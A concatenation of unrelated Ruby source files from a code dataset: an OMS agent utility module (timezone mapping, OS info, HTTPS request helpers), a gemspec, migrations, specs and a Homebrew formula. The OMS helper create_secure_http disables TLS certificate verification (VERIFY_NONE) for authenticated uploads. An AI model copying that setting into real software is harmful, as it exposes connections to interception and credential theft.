'Etc/GMT+7' => 'US Mountain Standard Time',
'Etc/GMT' => 'UTC',
'Etc/UTC' => 'UTC',
'America/Danmarkshavn' => 'UTC',
'Etc/GMT-12' => 'UTC+12',
'Pacific/Tarawa' => 'UTC+12',
'Pacific/Majuro' => 'UTC+12',
'Pacific/Kwajalein' => 'UTC+12',
'Pacific/Nauru' => 'UTC+12',
'Pacific/Funafuti' => 'UTC+12',
'Pacific/Wake' => 'UTC+12',
'Pacific/Wallis' => 'UTC+12',
'Etc/GMT+2' => 'UTC-02',
'America/Noronha' => 'UTC-02',
'Atlantic/South_Georgia' => 'UTC-02',
'Etc/GMT+11' => 'UTC-11',
'Pacific/Pago_Pago' => 'UTC-11',
'Pacific/Niue' => 'UTC-11',
'Pacific/Midway' => 'UTC-11',
'Asia/Ulaanbaatar' => 'Ulaanbaatar Standard Time',
'Asia/Choibalsan' => 'Ulaanbaatar Standard Time',
'America/Caracas' => 'Venezuela Standard Time',
'Asia/Vladivostok' => 'Vladivostok Standard Time',
'Asia/Sakhalin' => 'Vladivostok Standard Time',
'Asia/Ust-Nera' => 'Vladivostok Standard Time',
'Australia/Perth' => 'W. Australia Standard Time',
'Antarctica/Casey' => 'W. Australia Standard Time',
'Africa/Lagos' => 'W. Central Africa Standard Time',
'Africa/Luanda' => 'W. Central Africa Standard Time',
'Africa/Porto-Novo' => 'W. Central Africa Standard Time',
'Africa/Kinshasa' => 'W. Central Africa Standard Time',
'Africa/Bangui' => 'W. Central Africa Standard Time',
'Africa/Brazzaville' => 'W. Central Africa Standard Time',
'Africa/Douala' => 'W. Central Africa Standard Time',
'Africa/Algiers' => 'W. Central Africa Standard Time',
'Africa/Libreville' => 'W. Central Africa Standard Time',
'Africa/Malabo' => 'W. Central Africa Standard Time',
'Africa/Niamey' => 'W. Central Africa Standard Time',
'Africa/Ndjamena' => 'W. Central Africa Standard Time',
'Africa/Tunis' => 'W. Central Africa Standard Time',
'Etc/GMT-1' => 'W. Central Africa Standard Time',
'Europe/Berlin' => 'W. Europe Standard Time',
'Europe/Andorra' => 'W. Europe Standard Time',
'Europe/Vienna' => 'W. Europe Standard Time',
'Europe/Zurich' => 'W. Europe Standard Time',
'Europe/Busingen' => 'W. Europe Standard Time',
'Europe/Gibraltar' => 'W. Europe Standard Time',
'Europe/Rome' => 'W. Europe Standard Time',
'Europe/Vaduz' => 'W. Europe Standard Time',
'Europe/Luxembourg' => 'W. Europe Standard Time',
'Europe/Monaco' => 'W. Europe Standard Time',
'Europe/Malta' => 'W. Europe Standard Time',
'Europe/Amsterdam' => 'W. Europe Standard Time',
'Europe/Oslo' => 'W. Europe Standard Time',
'Europe/Stockholm' => 'W. Europe Standard Time',
'Arctic/Longyearbyen' => 'W. Europe Standard Time',
'Europe/San_Marino' => 'W. Europe Standard Time',
'Europe/Vatican' => 'W. Europe Standard Time',
'Asia/Tashkent' => 'West Asia Standard Time',
'Antarctica/Mawson' => 'West Asia Standard Time',
'Asia/Oral' => 'West Asia Standard Time',
'Asia/Aqtau' => 'West Asia Standard Time',
'Asia/Aqtobe' => 'West Asia Standard Time',
'Indian/Maldives' => 'West Asia Standard Time',
'Indian/Kerguelen' => 'West Asia Standard Time',
'Asia/Dushanbe' => 'West Asia Standard Time',
'Asia/Ashgabat' => 'West Asia Standard Time',
'Asia/Samarkand' => 'West Asia Standard Time',
'Etc/GMT-5' => 'West Asia Standard Time',
'Pacific/Port_Moresby' => 'West Pacific Standard Time',
'Antarctica/DumontDUrville' => 'West Pacific Standard Time',
'Pacific/Truk' => 'West Pacific Standard Time',
'Pacific/Guam' => 'West Pacific Standard Time',
'Pacific/Saipan' => 'West Pacific Standard Time',
'Etc/GMT-10' => 'West Pacific Standard Time',
'Asia/Yakutsk' => 'Yakutsk Standard Time',
'Asia/Chita' => 'Yakutsk Standard Time',
'Asia/Khandyga' => 'Yakutsk Standard Time'
}
@@tzLocalTimePath = '/etc/localtime'
@@tzBaseFolder = '/usr/share/zoneinfo/'
@@tzRightFolder = 'right/'
class << self
# get the unified timezone id by absolute file path of the timezone file
# file path: the absolute path of the file
def get_unified_timezoneid(filepath)
# remove the baseFolder path
tzID = filepath[@@tzBaseFolder.length..-1] if filepath.start_with?(@@tzBaseFolder)
return 'Unknown' if tzID.nil?
# if the rest starts with 'right/', remove it to unify the format
tzID = tzID[@@tzRightFolder.length..-1] if tzID.start_with?(@@tzRightFolder)
return tzID
end # end get_unified_timezoneid
def get_current_timezone
return @@CurrentTimeZone if !@@CurrentTimeZone.nil?
tzID = 'Unknown'
begin
# if /etc/localtime is a symlink, check the link file's path
if File.symlink?(@@tzLocalTimePath)
symlinkpath = File.absolute_path(File.readlink(@@tzLocalTimePath), File.dirname(@@tzLocalTimePath))
tzID = get_unified_timezoneid(symlinkpath)
# look for the entry in the timezone mapping
if @@tzMapping.has_key?(tzID)
@@CurrentTimeZone = @@tzMapping[tzID]
return @@CurrentTimeZone
end
end
# calculate the md5 of /etc/locatime
md5sum = Digest::MD5.file(@@tzLocalTimePath).hexdigest
# looks for a file in the /usr/share/zoneinfo/, which is identical to /etc/localtime. use the file name as the timezone
Dir.glob("#{@@tzBaseFolder}**/*") { |filepath|
# find all the files whose md5 is the same as the /etc/localtime
if File.file? filepath and Digest::MD5.file(filepath).hexdigest == md5sum
tzID = get_unified_timezoneid(filepath)
# look for the entry in the timezone mapping
if @@tzMapping.has_key?(tzID)
@@CurrentTimeZone = @@tzMapping[tzID]
return @@CurrentTimeZone
end
end
}
rescue => error
Log.error_once("Unable to get the current time zone: #{error}")
end
# assign the tzID if the corresponding Windows Time Zone is not found
@@CurrentTimeZone = tzID if @@CurrentTimeZone.nil?
return @@CurrentTimeZone
end # end get_current_timezone
def get_os_full_name(conf_path = "/etc/opt/microsoft/scx/conf/scx-release")
return @@OSFullName if !@@OSFullName.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
os_full_name = conf[/OSFullName=(.*?)\n/, 1]
if os_full_name and os_full_name.size
@@OSFullName = os_full_name
end
end
return @@OSFullName
end
def get_os_name(conf_path = "/etc/opt/microsoft/scx/conf/scx-release")
return @@OSName if !@@OSName.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
os_name = conf[/OSName=(.*?)\n/, 1]
if os_name and os_name.size
@@OSName = os_name
end
end
return @@OSName
end
def get_os_version(conf_path = "/etc/opt/microsoft/scx/conf/scx-release")
return @@OSVersion if !@@OSVersion.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
os_version = conf[/OSVersion=(.*?)\n/, 1]
if os_version and os_version.size
@@OSVersion = os_version
end
end
return @@OSVersion
end
def get_hostname
return @@Hostname if !@@Hostname.nil?
begin
hostname = Socket.gethostname.split(".")[0]
rescue => error
Log.error_once("Unable to get the Host Name: #{error}")
else
@@Hostname = hostname
end
return @@Hostname
end
def get_fully_qualified_domain_name
return @@FQDN unless @@FQDN.nil?
begin
fqdn = Socket.gethostbyname(Socket.gethostname)[0]
rescue => error
Log.error_once("Unable to get the FQDN: #{error}")
else
@@FQDN = fqdn
end
return @@FQDN
end
def get_installed_date(conf_path = "/etc/opt/microsoft/omsagent/sysconf/installinfo.txt")
return @@InstalledDate if !@@InstalledDate.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
installed_date = conf[/(.*)\n(.*)/, 2]
if installed_date and installed_date.size
begin
Time.parse(installed_date)
rescue ArgumentError
Log.error_once("Invalid install date: #{installed_date}")
else
@@InstalledDate = installed_date
end
end
end
return @@InstalledDate
end
def get_agent_version(conf_path = "/etc/opt/microsoft/omsagent/sysconf/installinfo.txt")
return @@AgentVersion if !@@AgentVersion.nil?
if File.file?(conf_path)
conf = File.read(conf_path)
agent_version = conf[/([\d]+\.[\d]+\.[\d]+-[\d]+)\s.*\n/, 1]
if agent_version and agent_version.size
@@AgentVersion = agent_version
end
end
return @@AgentVersion
end
def format_time(time)
Time.at(time).utc.iso8601(3) # UTC with milliseconds
end
def format_time_str(time)
DateTime.parse(time).strftime("%FT%H:%M:%S.%3NZ")
end
def create_error_tag(tag)
"ERROR::#{tag}::"
end
# create an HTTP object which uses HTTPS
def create_secure_http(uri, proxy={})
if proxy.empty?
http = Net::HTTP.new( uri.host, uri.port )
else
http = Net::HTTP.new( uri.host, uri.port,
proxy[:addr], proxy[:port], proxy[:user], proxy[:pass])
end
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
http.open_timeout = 30
return http
end # create_secure_http
# create an HTTP object to ODS
def create_ods_http(ods_uri, proxy={})
http = create_secure_http(ods_uri, proxy)
http.cert = Configuration.cert
http.key = Configuration.key
return http
end # create_ods_http
# create an HTTPRequest object to ODS
# parameters:
# path: string. path of the request
# record: Hash. body of the request
# compress: bool. Whether the body of the request should be compressed
# extra_header: Hash. extra HTTP headers
# serializer: method. serializer of the record
# returns:
# HTTPRequest. request to ODS
def create_ods_request(path, record, compress, extra_headers=nil, serializer=method(:parse_json_record_encoding))
headers = extra_headers.nil? ? {} : extra_headers
azure_resource_id = OMS::Configuration.azure_resource_id
if !azure_resource_id.to_s.empty?
headers[OMS::CaseSensitiveString.new("x-ms-AzureResourceId")] = azure_resource_id
end
omscloud_id = OMS::Configuration.omscloud_id
if !omscloud_id.to_s.empty?
headers[OMS::CaseSensitiveString.new("x-ms-OMSCloudId")] = omscloud_id
end
uuid = OMS::Configuration.uuid
if !uuid.to_s.empty?
headers[OMS::CaseSensitiveString.new("x-ms-UUID")] = uuid
end
headers[OMS::CaseSensitiveString.new("X-Request-ID")] = SecureRandom.uuid
headers["Content-Type"] = "application/json"
if compress == true
headers["Content-Encoding"] = "deflate"
end
req = Net::HTTP::Post.new(path, headers)
json_msg = serializer.call(record)
if json_msg.nil?
return nil
else
if compress == true
req.body = Zlib::Deflate.deflate(json_msg)
else
req.body = json_msg
end
end
return req
end # create_ods_request
# parses the json record with appropriate encoding
# parameters:
# record: Hash. body of the request
# returns:
# json represention of object,
# nil if encoding cannot be applied
def parse_json_record_encoding(record)
msg = nil
begin
msg = JSON.dump(record)
rescue => error
# failed encoding, encode to utf-8, iso-8859-1 and try again
begin
if !record["DataItems"].nil?
record["DataItems"].each do |item|
item["Message"] = item["Message"].encode('utf-8', 'iso-8859-1')
end
end
msg = JSON.dump(record)
rescue => error
# at this point we've given up up, we don't recognize
# the encode, so return nil and log_warning for the
# record
Log.warn_once("Skipping due to failed encoding for #{record}: #{error}")
end
end
return msg
end
# dump the records into json string
# assume the records is an array of single layer hash
# return nil if we cannot dump it
# parameters:
# records: hash[]. an array of single layer hash
def safe_dump_simple_hash_array(records)
msg = nil
begin
msg = JSON.dump(records)
rescue JSON::GeneratorError => error
Log.warn_once("Unable to dump to JSON string. #{error}")
begin
# failed to dump, encode to utf-8, iso-8859-1 and try again
# records is an array of hash
records.each do | hash |
# the value is a hash
hash.each do | key, value |
# the value should be of simple type
# encode the string to utf-8
if value.instance_of? String
hash[key] = value.encode('utf-8', 'iso-8859-1')
end
end
end
msg = JSON.dump(records)
rescue => error
# at this point we've given up, we don't recognize the encode,
# so return nil and log_warning for the record
Log.warn_once("Skipping due to failed encoding for #{records}: #{error}")
end
rescue => error
# unexpected error when dumpping the records into JSON string
# skip here and return nil
Log.warn_once("Skipping due to unexpected error for #{records}: #{error}")
end
return msg
end # safe_dump_simple_hash_array
# start a request
# parameters:
# req: HTTPRequest. request
# secure_http: HTTP. HTTPS
# ignore404: bool. ignore the 404 error when it's true
# returns:
# string. body of the response
def start_request(req, secure_http, ignore404 = false)
# Tries to send the passed in request
# Raises an exception if the request fails.
# This exception should only be caught by the fluentd engine so that it retries sending this
begin
res = nil
res = secure_http.start { |http| http.request(req) }
rescue => e # rescue all StandardErrors
# Server didn't respond
raise RetryRequestException, "Net::HTTP.#{req.method.capitalize} raises exception: #{e.class}, '#{e.message}'"
else
if res.nil?
raise RetryRequestException, "Failed to #{req.method} at #{req.to_s} (res=nil)"
end
if res.is_a?(Net::HTTPSuccess)
return res.body
end
if ignore404 and res.code == "404"
return ''
end
if res.code != "200"
# Retry all failure error codes...
res_summary = "(request-id=#{req["X-Request-ID"]}; class=#{res.class.name}; code=#{res.code}; message=#{res.message}; body=#{res.body};)"
Log.error_once("HTTP Error: #{res_summary}")
raise RetryRequestException, "HTTP error: #{res_summary}"
end
end # end begin
end # end start_request
end # Class methods
end # class Common
class IPcache
def initialize(refresh_interval_seconds)
@cache = {}
@cache_lock = Mutex.new
@refresh_interval_seconds = refresh_interval_seconds
@condition = ConditionVariable.new
@thread = Thread.new(&method(:refresh_cache))
end
def get_ip(hostname)
@cache_lock.synchronize {
if @cache.has_key?(hostname)
return @cache[hostname]
else
ip = get_ip_from_socket(hostname)
@cache[hostname] = ip
return ip
end
}
end
private
def get_ip_from_socket(hostname)
begin
addrinfos = Socket::getaddrinfo(hostname, "echo", Socket::AF_UNSPEC)
rescue => error
Log.error_once("Unable to resolve the IP of '#{hostname}': #{error}")
return nil
end
if addrinfos.size >= 1
return addrinfos[0][3]
end
return nil
end
def refresh_cache
while true
@cache_lock.synchronize {
@condition.wait(@cache_lock, @refresh_interval_seconds)
# Flush the cache completely to prevent it from growing indefinitly
@cache = {}
}
end
end
end
class CaseSensitiveString < String
def downcase
self
end
def capitalize
self
end
end
end # module OMS
| 42.455668 | 149 | 0.612271 |
032fd765bf9b06ff402cc93c9607c7f32ae11394 | 1,317 | # frozen_string_literal: true
require_relative 'lib/riot_games_api_client/version'
Gem::Specification.new do |spec|
spec.name = 'riot_games_api_client'
spec.version = RiotGamesApiClient::VERSION
spec.authors = ['Ryo Nakamura']
spec.email = ['[email protected]']
spec.summary = 'Riot Games API client.'
spec.homepage = 'https://github.com/r7kamura/riot_games_api_client'
spec.license = 'MIT'
spec.required_ruby_version = Gem::Requirement.new('>= 2.5.0')
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata['homepage_uri'] = spec.homepage
spec.metadata['source_code_uri'] = spec.homepage
spec.metadata['changelog_uri'] = "#{spec.homepage}/blob/master/CHANGELOG.md"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path(__dir__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_runtime_dependency 'faraday'
spec.add_runtime_dependency 'faraday_middleware'
end
| 38.735294 | 87 | 0.690205 |
f7faa2147f80a7391d4e9354a60f6c650fb7bcc5 | 147 | class RemoveEncyclopaediaEntryIdFromTaggings < ActiveRecord::Migration
def change
remove_column :taggings, :encyclopaedia_entry_id
end
end
| 24.5 | 70 | 0.829932 |
3371a8c02ea2cbd53577cbad169b3e392040eafe | 965 | #Licensed to the Apache Software Foundation (ASF) under one or more
#contributor license agreements. See the NOTICE file distributed with
#this work for additional information regarding copyright ownership.
#The ASF licenses this file to You under the Apache License, Version 2.0
#(the "License"); you may not use this file except in compliance with
#the License. You may obtain a copy of the License at
#
#http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
#express or implied. See the License for the specific language governing
#permissions and limitations under the License.
r301 %r{/releases/latest/javadoc/(.*)}, 'http://geode.apache.org/releases/latest/javadoc/$1'
rewrite '/', '/docs/guide/113/about_geode.html'
rewrite '/index.html', '/docs/guide/113/about_geode.html'
| 50.789474 | 92 | 0.777202 |
21a227335cd232e2b445694cd58e2757320dc7c7 | 1,545 | require 'spec_helper'
describe Gitlab::ImportExport::AfterExportStrategies::WebUploadStrategy do
include StubRequests
let(:example_url) { 'http://www.example.com' }
let(:strategy) { subject.new(url: example_url, http_method: 'post') }
let!(:project) { create(:project, :with_export) }
let!(:user) { build(:user) }
subject { described_class }
describe 'validations' do
it 'only POST and PUT method allowed' do
%w(POST post PUT put).each do |method|
expect(subject.new(url: example_url, http_method: method)).to be_valid
end
expect(subject.new(url: example_url, http_method: 'whatever')).not_to be_valid
end
it 'onyl allow urls as upload urls' do
expect(subject.new(url: example_url)).to be_valid
expect(subject.new(url: 'whatever')).not_to be_valid
end
end
describe '#execute' do
it 'removes the exported project file after the upload' do
allow(strategy).to receive(:send_file)
allow(strategy).to receive(:handle_response_error)
expect(project).to receive(:remove_exports)
strategy.execute(user, project)
end
context 'when upload fails' do
it 'stores the export error' do
stub_full_request(example_url, method: :post).to_return(status: [404, 'Page not found'])
strategy.execute(user, project)
errors = project.import_export_shared.errors
expect(errors).not_to be_empty
expect(errors.first).to eq "Error uploading the project. Code 404: Page not found"
end
end
end
end
| 30.294118 | 96 | 0.688026 |
bf53558c746f058e5e5f7abecf00e1472657fba8 | 760 | require File.expand_path("../../Abstract/abstract-php-extension", __FILE__)
class Php70Uv < AbstractPhp70Extension
init
desc "interface to libuv library"
homepage "https://github.com/bwoebi/php-uv"
url "https://github.com/bwoebi/php-uv/archive/v0.1.1.tar.gz"
sha256 "e576df44997a0b656deb4a1c2bfd1879fb3647419b0724bd6e87c7ddf997e2c1"
head "https://github.com/bwoebi/php-uv.git"
depends_on "libuv"
def install
# ENV.universal_binary if build.universal?
safe_phpize
system "./configure", "--prefix=#{prefix}",
phpconfig,
"--with-uv=#{Formula["libuv"].opt_prefix}"
system "make"
prefix.install "modules/uv.so"
write_config_file if build.with? "config-file"
end
end
| 29.230769 | 75 | 0.677632 |
bba29de51b5421eae6c6ba67dc71cdece160df89 | 715 | require "rails_helper"
RSpec.feature "Payroll run download" do
scenario "User can download a payroll run file" do
sign_in_to_admin_with_role(DfeSignIn::User::PAYROLL_OPERATOR_DFE_SIGN_IN_ROLE_CODE)
payroll_run = create(:payroll_run, claims_counts: {StudentLoans: 2, MathsAndPhysics: 1})
visit new_admin_payroll_run_download_path(payroll_run)
expect(page).to have_content "This month's payroll file is ready for processing."
click_on "Download payroll file"
click_on "Download #{payroll_run.created_at.strftime("%B")} payroll file"
expect(page.response_headers["Content-Type"]).to eq("text/csv")
csv = CSV.parse(body, headers: true)
expect(csv.count).to eq(3)
end
end
| 31.086957 | 92 | 0.751049 |
4aa84d5de18e24cfae44476d51e4f768193e6d76 | 787 | # == Schema Information
#
# Table name: gears
#
# @!attribute id
# @return []
# @!attribute armor
# @return [Integer]
# @!attribute description
# @return [String]
# @!attribute harm
# @return [Integer]
# @!attribute name
# @return [String]
# @!attribute created_at
# @return [Time]
# @!attribute updated_at
# @return [Time]
# @!attribute playbook_id
# @return []
#
# Indexes
#
# index_gears_on_playbook_id (playbook_id)
#
# Foreign Keys
#
# fk_rails_... (playbook_id => playbooks.id)
#
FactoryBot.define do
factory :gear do
name { "Sword" }
description { "Silver sword" }
harm { 2 }
armor { 1 }
playbook
trait :with_tags do
after(:create) do |gear|
gear.tag_list = %w(heavy slow)
gear.save
end
end
end
end
| 17.108696 | 46 | 0.614994 |
18cfd4caa143eb32bf97342c214be4c99f82a1b8 | 281 | #!/usr/bin/env ruby
#
# Put description here
#
#
#
#
#
require 'swig_assert'
require 'template_rename'
i = Template_rename::IFoo.new
d = Template_rename::DFoo.new
a = i.blah_test(4)
b = i.spam_test(5)
c = i.groki_test(6)
x = d.blah_test(7)
y = d.spam(8)
z = d.grok_test(9)
| 11.708333 | 29 | 0.658363 |
ac5feb298ae224bb14cb2af4c8d005763c65f50b | 490 | # Tests windows_ad::default
# Tests windows_ad::domain - create forest
include_recipe 'windows_ad::default'
user = 'Administrator'
pass = 'Password1234###!'
domain = 'contoso.local'
execute "net user \"#{user}\" \"#{pass}\""
windows_ad_domain domain do
type 'forest'
safe_mode_pass pass
domain_pass pass
domain_user user
case node['os_version']
when '6.1'
options ({ 'InstallDNS' => 'yes' })
when '6.2'
options ({ 'InstallDNS' => nil })
end
action :create
end
| 19.6 | 42 | 0.673469 |
91b1f69687a77037baa0774538e59f238317f136 | 2,489 | # frozen_string_literal: true
#
# Copyright:: Copyright 2020, Chef Software Inc.
# Author:: Tim Smith (<[email protected]>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module RuboCop
module Cop
module Chef
module ChefCorrectness
# The macos_userdefaults resource prior to Chef Infra Client 16.3 would silently continue if invalid types were passed resulting in unexpected behavior. Valid values are: "array", "bool", "dict", "float", "int", and "string".
#
# @example
#
# # bad
# macos_userdefaults 'set a value' do
# global true
# key 'key'
# type 'boolean'
# end
#
# # good
# macos_userdefaults 'set a value' do
# global true
# key 'key'
# type 'bool'
# end
#
class MacosUserdefaultsInvalidType < Base
include RuboCop::Chef::CookbookHelpers
extend RuboCop::Cop::AutoCorrector
VALID_VALUES = %w(array bool dict float int string).freeze
INVALID_VALUE_MAP = {
'boolean' => 'bool',
'str' => 'string',
'integer' => 'int',
}.freeze
MSG = 'The macos_userdefaults resource prior to Chef Infra Client 16.3 would silently continue if invalid types were passed resulting in unexpected behavior. Valid values are: "array", "bool", "dict", "float", "int", and "string".'
def on_block(node)
match_property_in_resource?(:macos_userdefaults, 'type', node) do |type|
type_val = method_arg_ast_to_string(type)
return if VALID_VALUES.include?(type_val)
add_offense(type, message: MSG, severity: :refactor) do |corrector|
next unless INVALID_VALUE_MAP[type_val]
corrector.replace(type, "type '#{INVALID_VALUE_MAP[type_val]}'")
end
end
end
end
end
end
end
end
| 36.602941 | 241 | 0.616714 |
7a4351b7f46ba070f922bb128c0acb2cb50520f4 | 498 | task :compile_licenses do
puts 'Compiling open source licenses via Yarn.'
output = 'public/LICENSE.txt'
`npx yarn licenses generate-disclaimer --silent > #{ output }`
additional_licenses = <<-HERE
-----
beige-tiles.png by SubtlePatterns and irongrip.png by Tony Kindard downloaded from toptal.com and released under the CC BY-SA 3.0 license, which can be found at https://creativecommons.org/licenses/by-sa/3.0/legalcode.
HERE
`echo "#{ additional_licenses }" >> #{ output }`
end
| 29.294118 | 218 | 0.726908 |
f8cd96586f3e7ef1de675373e5dd0044d03cccaf | 7,045 | # frozen_string_literal: true
# Routines for building and saving a course timeline after submission of wizard data
class WizardTimelineManager
###############
# Entry point #
###############
def self.update_timeline_and_tags(course, wizard_id, wizard_params)
new(course, wizard_id, wizard_params).update_timeline_and_tags
end
#############
# Main flow #
#############
def initialize(course, wizard_id, wizard_params)
@course = course
@output = wizard_params['wizard_output']['output'] || []
@logic = wizard_params['wizard_output']['logic'] || []
@tags = wizard_params['wizard_output']['tags'] || []
# Load the wizard content building blocks.
content_path = "#{Rails.root}/config/wizard/#{wizard_id}/content.yml"
@all_content = YAML.load_file(content_path)
@timeline = []
end
def update_timeline_and_tags
# Parse the submitted wizard data and collect selected content.
# @output is an array of strings that corresponds to the available
# output options in @all_content.
content_groups = @output.map do |content_key|
@all_content[content_key]
end
# Build a timeline array
build_timeline(content_groups)
# Create and save week/block objects based on the object generated above
save_timeline
# Save any tags that have been generated from this Wizard output
add_tags
end
###################
# Private methods #
###################
private
def build_timeline(content_groups)
available_weeks = @course.meetings_manager.open_weeks
return if available_weeks.zero?
@timeline = initial_weeks_and_weights(content_groups)
shorten_timeline_by_one_week until @timeline.size <= available_weeks
end
def initial_weeks_and_weights(content_groups)
content_groups.flatten.map do |week|
OpenStruct.new(weight: week['weight'],
blocks: week['blocks'])
end
end
# Find the two consecutive weeks with the lowest total weight, and combine
# then into a single week. This assumes at least two weeks in the timeline.
def shorten_timeline_by_one_week
week_pair_weights = {}
i = 0
@timeline.each_cons(2) do |week_pair|
week_pair_weights[i] = week_pair[0][:weight] + week_pair[1][:weight]
i += 1
end
lightest_weeks_index = week_pair_weights.min_by { |_first_week_index, weight| weight }[0]
squish_consecutive_weeks(lightest_weeks_index)
end
def squish_consecutive_weeks(first_week_index)
second_week_index = first_week_index + 1
@timeline[first_week_index][:weight] += @timeline[second_week_index][:weight]
@timeline[first_week_index][:blocks] += @timeline[second_week_index][:blocks]
@timeline.delete_at(second_week_index)
end
def save_timeline
@timeline.each_with_index do |week, week_index|
next if week[:blocks].blank?
week_record = Week.create(course_id: @course.id, order: week_index + 1)
week[:blocks].each_with_index do |block, block_index|
# Skip blocks with unmet 'if' dependencies
next unless if_dependencies_met?(block)
block['week_id'] = week_record.id
block['order'] = block_index + 1
save_block_and_gradeable(block)
end
end
end
def if_dependencies_met?(block)
if_met = !block.key?('if')
if_met ||= Array.wrap(block['if']).reduce(true) do |met, dep|
met && @logic.include?(dep)
end
if_met
end
def save_block_and_gradeable(block)
attr_keys_to_skip = %w[if graded points]
block_params = block.except(*attr_keys_to_skip)
block_record = Block.create(block_params)
add_handouts(block_record) if block_record.kind == Block::KINDS['handouts']
return unless block['graded']
gradeable = Gradeable.create(gradeable_item_id: block_record.id,
points: block['points'] || 10,
gradeable_item_type: 'block')
block_record.update(gradeable_id: gradeable.id)
end
# rubocop:disable Metrics/LineLength
HANDOUTS = {
'biographies_handout' => ['Biographies', 'https://wikiedu.org/biographies'],
'books_handout' => ['Books', 'https://wikiedu.org/books'],
'chemistry_handout' => ['Chemistry', 'https://wikiedu.org/chemistry'],
'cultural_anthropology_handout' => ['Cultural Anthropology', 'http://wikiedu.org/cultural_anthropology'],
'ecology_handout' => ['Ecology', 'https://wikiedu.org/ecology'],
'environmental_sciences_handout' => ['Environmental Sciences', 'https://wikiedu.org/environmental_sciences'],
'films_handout' => ['Films', 'https://wikiedu.org/films'],
'genes_and_proteins_handout' => ['Genes and Proteins', 'https://wikiedu.org/genes_and_proteins'],
'history_handout' => ['History', 'https://wikiedu.org/history'],
'LGBTplus_studies_handout' => ['LGBT+ Studies', 'http://wikiedu.org/lgbtplus_studies'],
'linguistics_handout' => ['Linguistics', 'https://wikiedu.org/linguistics'],
'medicine_handout' => ['Medicine', 'https://wikiedu.org/medicine'],
'political_science_handout' => ['Political Science', 'https://wikiedu.org/political_science'],
'psychology_handout' => ['Psychology', 'https://wikiedu.org/psychology'],
'science_communication_handout' => ['Science Communcation', 'https://wikiedu.org/science_communication'],
'sociology_handout' => ['Sociology', 'https://wikiedu.org/sociology'],
'species_handout' => ['Species', 'https://wikiedu.org/species'],
'womens_studies_handout' => ["Women's Studies", 'https://wikiedu.org/womens_studies']
}.freeze
# rubocop:enable Metrics/LineLength
def add_handouts(block)
content = +''
HANDOUTS.each_key do |logic_key|
next unless @logic.include?(logic_key)
content += link_to_handout(logic_key)
end
# Remove the block if it's empty; otherwise, update with content
content.blank? ? block.destroy : block.update(content: content)
end
def link_to_handout(logic_key)
link_text = HANDOUTS[logic_key][0]
url = HANDOUTS[logic_key][1]
<<~LINK
<p>
<a class="handout-link" href="#{url}" target="_blank">#{link_text}</a>
</p>
LINK
end
NONEXCLUSIVE_KEYS = ['topics'].freeze
def add_tags
@tags.each do |tag|
# Only one tag for each tag key is allowed. Overwrite the previous tag if
# one with the same key already exists, so that if a given choice is made
# a second time, the tag gets updated to reflect the new choice.
# NONEXCLUSIVE_KEYS are allowed to have multiple tags for one wziard key.
# We make this work by using the wizard key and value together as the record key.
wizard_key = tag[:key]
tag_value = tag[:tag]
tag_key = NONEXCLUSIVE_KEYS.include?(wizard_key) ? "#{wizard_key}-#{tag_value}" : wizard_key
if Tag.exists?(course_id: @course.id, key: tag_key)
Tag.find_by(course_id: @course.id, key: tag_key).update(tag: tag_value)
else
Tag.create(course_id: @course.id, tag: tag_value, key: tag_key)
end
end
end
end
| 37.275132 | 113 | 0.681192 |
8772f832d05c195a24bdde397732073b985033c2 | 4,558 | describe "{{helper context key=value}}" do
let(:global_helpers_providers) { [] }
describe "#compile" do
let(:post) { double("post") }
let(:presenter) { IntegrationTest::Presenter.new(double("view_context"), post: post) }
it "passes two arguments" do
template = Curlybars.compile(<<-HBS)
{{print_args_and_options 'first' 'second'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
first, second, key=
HTML
end
it "calls a helper without arguments in an if statement" do
template = Curlybars.compile(<<-HBS)
{{#if print_args_and_options}}
{{print_args_and_options 'first' 'second'}}
{{/if}}
HBS
expect(eval(template)).to resemble(<<-HTML)
first, second, key=
HTML
end
it "passes two arguments and options" do
template = Curlybars.compile(<<-HBS)
{{print_args_and_options 'first' 'second' key='value'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
first, second, key=value
HTML
end
it "renders a helper with expression and options" do
template = Curlybars.compile(<<-HBS)
{{date user.created_at class='metadata'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
<time datetime="2015-02-03T13:25:06Z" class="metadata">
February 3, 2015 13:25
</time>
HTML
end
it "renders a helper with only expression" do
template = Curlybars.compile(<<-HBS)
<script src="{{asset "jquery_plugin.js"}}"></script>
HBS
expect(eval(template)).to resemble(<<-HTML)
<script src="http://cdn.example.com/jquery_plugin.js"></script>
HTML
end
it "renders a helper with only options" do
template = Curlybars.compile(<<-HBS)
{{#with new_comment_form}}
{{input title class="form-control"}}
{{/with}}
HBS
expect(eval(template)).to resemble(<<-HTML)
<input name="community_post[title]"
id="community_post_title"
type="text"
class="form-control"
value="some value persisted in the DB">
HTML
end
it "renders correctly a return type of integer" do
template = Curlybars.compile(<<-HBS)
{{integer 'ignored'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
0
HTML
end
it "renders correctly a return type of boolean" do
template = Curlybars.compile(<<-HBS)
{{boolean 'ignored'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
true
HTML
end
it "handles correctly a method that invokes `yield`, returning empty string" do
